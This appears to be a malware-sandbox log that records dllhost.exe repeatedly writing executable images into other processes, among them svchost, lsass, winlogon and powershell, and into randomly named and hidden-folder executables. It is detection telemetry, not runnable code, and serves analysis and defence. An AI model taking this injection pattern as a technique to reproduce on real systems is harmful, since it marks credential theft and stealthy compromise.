Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A8C180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 242BF650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2578F260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1E591C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
